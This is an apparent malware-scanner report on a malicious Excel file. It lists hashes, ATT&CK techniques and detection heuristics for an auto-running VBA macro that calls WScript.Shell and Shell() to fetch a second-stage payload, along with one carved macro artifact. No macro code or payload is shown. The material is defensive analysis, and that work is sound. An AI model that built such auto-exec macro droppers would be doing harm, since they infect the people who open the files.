Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 b98ed0b56caabd2a…

MALICIOUS

Office (OLE) / .XLS

153.5 KB Created: 2018-12-06 20:43:11 Authoring application: Microsoft Excel First seen: 2022-03-01
MD5: ae4d8c9d03682e8c7fabc1d0f3b18e96 SHA-1: 40fdeeb56c59d14237d32c8b6aafabf4286afb2d SHA-256: b98ed0b56caabd2a859387bb9d999a0b179708869014bedd5f679a0494df1c66
348 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File

The critical heuristics OLE_VBA_SHELL and OLE_VBA_WSCRIPT indicate the use of WScript.Shell to execute commands. The Workbook_Open macro (OLE_VBA_WBOPEN) is automatically triggered upon opening the workbook, suggesting an immediate execution of the malicious payload. The script appears to be heavily obfuscated, but the presence of WScript.Shell and Shell() calls strongly suggests the download and execution of a second-stage payload. The specific obfuscated string reconstruction is not possible due to truncation.

Heuristics 9

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
95420a9cf6a2b22ed28c3cfd00eb668a704fac403af455a33ad4070e6e298a24		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 46391 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s). Carved artifact contains 3 long base64-like blob(s). Carved macro source contains an auto-exec entry point and execution/download terms.

Open this report in the interactive analyzer, or submit your own file for analysis.